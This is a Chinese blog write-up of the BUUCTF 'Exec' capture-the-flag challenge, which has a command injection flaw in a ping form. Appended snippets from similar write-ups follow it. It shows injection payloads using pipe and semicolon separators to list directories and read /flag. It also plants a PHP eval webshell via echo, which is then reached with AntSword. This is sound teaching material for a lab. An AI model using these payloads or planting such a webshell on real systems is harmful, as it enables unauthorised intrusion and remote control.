BUUCTF web题目之Exec

最新推荐文章于 2024-07-25 22:56:40 发布

花花小猪包

最新推荐文章于 2024-07-25 22:56:40 发布

阅读量919

点赞数 16

文章标签： web安全网络安全 php

本文链接：https://blog.csdn.net/m0_54993799/article/details/134959626

版权

登录BUUCTF在线测评 BUUCTF在线评测

开启靶机并访问，得到下面的页面

根据提示输入要ping的地址

尝试ping本身看看

发现是可以ping通的

尝试执行命令这里用到 | 符号分隔

补充知识点-》分隔符
command1 | command2      只执行 command2   
command1 || command2     先执行 command1，如果为假，再执行 command2

127.0.0.1|whoami ，得到下面结果

可以大胆尝试其他命令

我输入 1| ls ，得到当前页面为index.php

往上跳一级 1 | ls ../

继续往上跳……

往上跳3层发现了flag

尝试cd到往上三层，但是没有成功

1| ls /

确定是根目录后，用cat查看flag

1 | cat /flag

获得了flag内容

当然也可以尝试用 webshell

首先，先往靶机写入shell文件

1 | echo '<?php @eval($_POST[123]);?>' > 123.php 点击ping后，

复制url，在url后添加 /123.php , 用蚁剑连接 , 密码就是$_post[] 中括号里的内容

测试连接成功后，点击添加，双击进入文件管理页面

查找文件夹，最后在根目录下发现flag

双击flag，即可看到flag内容

提交flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

花花小猪包

关注关注

16
点赞
踩
13

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

BUUCTF[ACTF2020 新生赛]Exec

m0_47745762的博客

07-20

311

一、题目内容对Linux命令的运用二、解题步骤 ①从根目录查找flag （1）进入到靶机中（2）用本机地址随便ping一下，看看能得到那些信息（3）然后通过ls命令查找当前目录中有哪些文件（4）查找后发现只有一个index.php的文件，我们查找一下里面是否含有flag的信息（5）分析PHP代码，发现只有一个isset函数用于判断post传过来的数据是否被提交过来（6）我们发现当前目录中并没有关于flag的相关信息，那就可能是在根目录上，我们就挨个返..

BUUCTF web(一)

最新发布

2401_82505448的博客

07-25

207

发现根目录有一个flag文件，接着我们就可以查看根目录的flag。前面错误后面也可以执行，所有都可执行。|| 或前面命令错误才会执行后面的。&& 与前者成立前提下后者才执行。

Buuctf Exec

Dexret的博客

12-06

1748

打开该靶机，发现该页面为一个ping页面输入127.0.0.1测试，发现和电脑cmd上ping的结果差不多构造payload 127.0.0.1&cat /flag 得到该题的flag flag{e166f81d-5663-4153-b837-c6484858bf25}

BUUCTF【Web】Exec（命令执行漏洞）

qq_70434663的博客

03-02

1160

在根目录中我们发现有一个flag文件，猜测我们的flag就在里面，所以我们需要使用命令来读取flag文件的内容。命令大家可以在网上查看，这里使用的命令是127.0.0.1 & cat /flag（也可以使用127.0.0.1 | cat /flag）了解拼接符后我们先试一下查看目录，发现使用127.0.0.1 && ls执行不了，使用127.0.0.1 & ls有回显。在进入靶场后发现窗口ping，猜测可能是SQL注入，也有可能是命令执行漏洞。命令执行就用命令拼接符执行漏洞命令就行。

BUUCTF [ACTF2020 新生赛] Exec

Senimo

10-18

972

BUUCTF [ACTF2020 新生赛]Exec

FY_13_14的博客

01-05

246

1.刚打开的时候如图所示先随便用一个地址127.0.0.1 2.然后查下目录127.0.0.1|ls ../../../ ls看文件目录发现flag 直接抓127.0.0.1;cat/flag 拿到flag flag{fdc896b1-e032-4e87-846f-082e348e024f} 常见的管道符 |（就是按位或），直接执行|后面的语句 ||（就是逻辑或），如果前面命令是错的那么就执行后面的语句，否则只执行前面的语句 &（就是按位与），&前.

buucft web (exec)

a34376764的博客

03-20

601

BUUCTF-WEB

ccfly1012的博客

11-02

3864

目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页，查看一下源代

BUUCTF-练习场-Web（5-8）

m0_62905745的博客

10-26

1526

SQL注入的解题大概步骤，以及爆表爆库查字段绕过空格，替换字符的方法命令执行漏洞

BUUCTF Web1

ookami6497的博客

12-11

899

无

BUUCTF--WEB

书山有路勤为径，学海无涯苦作舟

06-28

1248

可以猜测，这个输入框是搜索当前数据库里的表id号应该，回显得数据就是表words里的两个字段id和data，但是我们flag在当前数据库的。他的后端既然能做到数字回显字母不回显，说明有一个或结构，而且不直接回显flag，但作为一道题目，from一定是from flag。mb_substr($page，n，m)：返回page中从第n位开始，到n+m位字符串的值。再跳转到新的页面什么也没有就结束了，所以在这个页面，我们请点击抓包，就能发现他的秘密。内联函数：将指定的函数体插入并取代每一处调用该函数的地方。

BUUCTF__web题解合集（十一）

风过江南乱的博客

10-04

1331

1、[GKCTF2020]EZ三剑客-EzWeb 2、[BJDCTF 2nd]elementmaster 3、[MRCTF2020]套娃 4、[FBCTF2019]RCEService 5、[WUSTCTF2020]颜值成绩查询

BUUCTF刷题记录 Exec

m0_46576074的博客

05-11

405

[ACTF2020 新生赛]Exec 进入页面首先 127.0.0.1;ls 进行目录读取，然后 127.0.0.1;cat /flag 得flag

BUUCTF：[ACTF2020 新生赛]Exec

末初的CSDN博客

10-20

349

题目地址：https://buuoj.cn/challenges#[ACTF2020%20%E6%96%B0%E7%94%9F%E8%B5%9B]Exec 命令执行，使用;或者|进行注入在根目录发现flag，直接读取

buuctf [ACTF2020 新生赛]Exec

qq_1873822的博客

03-05

187

又是一道命令执行的题 ping一下127.0.0.1 然后尝试直接cat flag 1.|（就是按位或），直接执行|后面的语句 127.0.0.1 | cat /flag 2、||（就是逻辑或），如果前面命令是错的那么就执行后面的语句，否则只执行前面的语句 a || cat /flag 3、&（就是按位与），&前面和后面命令都要执行，无论前面真假 127.0.0.1 & cat /flag 4、 ;（linux下有的，和&一样的作用） 127.0.0.1;cat /f

Buuctf-Web-[ACTF2020 新生赛]Exec 题解&思路总结

m0_62239233的博客

04-22

627

常见的web漏洞——命令注入

BUUCTF web竞赛：安全漏洞利用与php技巧

在本篇文档中，我们主要探讨了两个来自BUUCTF的Web安全挑战题目："[WMCTF2020] MakePHPGreatAgain" 和 "EasyBypass"。这两个题目着重考察了参赛者对PHP编程语言的理解以及对Web应用程序安全漏洞的识别。 1. [WMCTF...